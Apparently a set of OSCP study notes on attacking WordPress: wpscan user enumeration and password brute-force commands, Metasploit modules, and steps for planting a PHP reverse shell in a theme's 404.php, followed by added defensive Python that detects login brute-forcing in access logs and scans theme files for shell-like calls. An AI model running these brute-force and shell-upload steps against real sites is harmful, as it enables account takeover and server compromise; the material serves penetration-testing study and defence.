OSCP Notes



  • Brute-force http://$IP/wp-admin, http://$IP/wp-login.php
    # Extract users, version
    wpscan --url http://$IP --enumerate
    # Brute-force creds (user: admin)
    wpscan --url http://$IP --wordlist rockyou.txt --username $USERS --max-threads 3
    # (wpscan 3.x renamed these: -U/--usernames and -P/--passwords replace --username/--wordlist)
    # Ignore the SSL cert error
    wpscan --url https://$IP --disable-tls-checks
  • Metasploit
    • brute-force: msf > use auxiliary/scanner/http/wordpress_login_enum
  • Check http://$IP/wp-content/themes, http://$IP/wp-content/uploads
  • Possible attack vectors:
    • After login, upload php reverse shell in 404.php of a theme (wp-content/themes/twentynineteen/404.php)
    • msf > use exploit/unix/webapp/wp_admin_shell_upload
    • Upload malicious plugins in zip
  • Check interesting files: /var/www/wp-config.php
  • Check plugins’ vulnerability
    • WordPress Plugin User Role Editor (https://www.exploit-db.com/exploits/44595): THM-Jack

Where uploads are stored

<base URL>/wp-content/uploads/<yyyy>/<mm>/<file name>

WordPress Enumeration

wpscan --url <url> -e vt,tt,u,ap -o wpscan.log

WordPress Bruteforcing

wpscan --url <url> --wordlist <wordlist> --username <username>
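Defender-side counterpart to the brute-force commands above, added here as an example and not part of the original notes: a small detector that runs over web-server access logs, counts POSTs to the login endpoints (wp-login.php and xmlrpc.php, the two paths password guessing hits) per client inside a sliding window, and flags a client that exceeds a threshold. It also watches for the tell-tale success signal: wp-login.php re-renders the form with HTTP 200 on a failed login and redirects with 302 on a successful one, so a 302 following a burst of 200s from the same IP means a guess worked. The log lines are constructed sample data; the window and threshold are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined-log-format prefix: client IP, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Endpoints password guessing hits: the login form and the XML-RPC API.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def detect_bruteforce(lines, window_seconds=60, threshold=10):
    """Return {ip: {"attempts": total login POSTs, "success": bool}} for every
    client that sent >= threshold login POSTs inside any window_seconds window."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs inside the window
    totals = defaultdict(int)     # ip -> all login POSTs seen so far
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in LOGIN_PATHS:
            continue
        ip, ts = rec["ip"], rec["ts"]
        totals[ip] += 1
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold or ip in flagged:
            entry = flagged.setdefault(ip, {"attempts": 0, "success": False})
            entry["attempts"] = totals[ip]
            # 200 = form re-rendered (failed login); 302 = redirect to wp-admin (success).
            if rec["status"] == 302:
                entry["success"] = True
    return flagged


def build_sample_log():
    """Constructed sample access-log lines (not real traffic)."""
    fmt = ('{ip} - - [10/Oct/2023:13:55:{sec:02d} +0000] '
           '"POST /wp-login.php HTTP/1.1" {status} 4521 "-" "Mozilla/5.0"')
    lines = []
    # Guessing client: 12 failed attempts one second apart, then a success.
    for sec in range(1, 13):
        lines.append(fmt.format(ip="203.0.113.10", sec=sec, status=200))
    lines.append(fmt.format(ip="203.0.113.10", sec=13, status=302))
    # Legitimate user: one typo, then a correct login. Must not be flagged.
    lines.append(fmt.format(ip="198.51.100.7", sec=20, status=200))
    lines.append(fmt.format(ip="198.51.100.7", sec=25, status=302))
    # Unrelated GET the detector must ignore.
    lines.append('198.51.100.7 - - [10/Oct/2023:13:55:30 +0000] '
                 '"GET /wp-content/uploads/2023/10/a.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, info in detect_bruteforce(build_sample_log()).items():
        print(f"{ip}: {info['attempts']} login POSTs, success={info['success']}")
```

Feed it `open("/var/log/apache2/access.log")` (or the nginx equivalent) instead of `build_sample_log()`; a flagged IP with `success=True` is the one to treat as a compromised admin account rather than just a noisy scanner.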

Spawn Shell From WP Admin Access

Navigate to:
Appearance (left-hand side) > Editor (left-hand side) > 404 Template (right-hand side)
Replace the PHP there with malicious shell spawning PHP (e.g. pentestmonkey php reverse shell script)
Browse to http://<site_name>/wp-content/themes/<theme_name>/404.php to trigger the payload
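The mitigation and detection side of the theme-editor technique above (and of the plugin-zip upload route in the first list), added here as an example and not part of the original notes. WordPress honours two constants in wp-config.php: `DISALLOW_FILE_EDIT` removes the Appearance > Editor and plugin editor screens entirely, and `DISALLOW_FILE_MODS` additionally blocks plugin/theme installs and updates from the dashboard, which closes the zip-upload route too. The script checks a wp-config.php for both and then scans every PHP file under wp-content/themes for calls that a page template has no business making (the `SUSPICIOUS_CALLS` list is my heuristic). The WordPress tree it runs against is a constructed temporary sample, not a real install.

```python
import os
import re
import tempfile

# wp-config.php constants: DISALLOW_FILE_EDIT hides the theme/plugin editors,
# DISALLOW_FILE_MODS also blocks installing or updating themes/plugins from the dashboard.
HARDENING_CONSTANTS = ("DISALLOW_FILE_EDIT", "DISALLOW_FILE_MODS")

# Heuristic (assumed) list: PHP calls rarely needed in a theme template but
# typical of web shells and reverse shells pasted into one.
SUSPICIOUS_CALLS = ("shell_exec", "exec", "system", "passthru", "proc_open",
                    "popen", "fsockopen", "eval", "base64_decode")


def hardening_status(wp_config_text):
    """Return {constant: True/False}: True when define('NAME', true) is present."""
    status = {}
    for name in HARDENING_CONSTANTS:
        pat = re.compile(r"define\(\s*['\"]%s['\"]\s*,\s*true\s*\)" % name, re.IGNORECASE)
        status[name] = bool(pat.search(wp_config_text))
    return status


def scan_theme_files(wp_root):
    """Walk wp-content/themes; return [(relative path, [suspicious calls found])]
    for every PHP file that references at least one call from SUSPICIOUS_CALLS."""
    themes_dir = os.path.join(wp_root, "wp-content", "themes")
    findings = []
    for dirpath, _, filenames in os.walk(themes_dir):
        for fn in filenames:
            if not fn.endswith(".php"):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            # \b keeps "exec(" from matching inside "shell_exec(".
            hits = [c for c in SUSPICIOUS_CALLS
                    if re.search(r"\b%s\s*\(" % re.escape(c), src)]
            if hits:
                rel = os.path.relpath(full, wp_root).replace(os.sep, "/")
                findings.append((rel, hits))
    return sorted(findings)


def audit(wp_root):
    """Combine both checks for one install root."""
    with open(os.path.join(wp_root, "wp-config.php"), encoding="utf-8") as fh:
        cfg = fh.read()
    return {"hardening": hardening_status(cfg), "findings": scan_theme_files(wp_root)}


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def build_sample_install(file_edit_disabled=False):
    """Create a constructed, minimal WordPress-like tree in a temp dir (sample
    data, not a real install) and return its root path."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    cfg = "<?php\ndefine('DB_NAME', 'wordpress');\n"
    if file_edit_disabled:
        cfg += "define('DISALLOW_FILE_EDIT', true);\n"
    _write(root, "wp-config.php", cfg)
    # Untouched template.
    _write(root, "wp-content/themes/twentynineteen/404.php",
           "<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n")
    # Tampered template: socket + command execution pasted into the 404 page.
    _write(root, "wp-content/themes/twentytwenty/404.php",
           "<?php\n$s = fsockopen($host, $port);\nexec($cmd);\n")
    return root


if __name__ == "__main__":
    print(audit(build_sample_install()))
```

Point `audit()` at a real document root (e.g. `/var/www/html`) to use it. A hit on `base64_decode` alone is worth eyeballing rather than alerting on, since some legitimate plugins use it; a 404.php that opens sockets or runs commands is not a false positive.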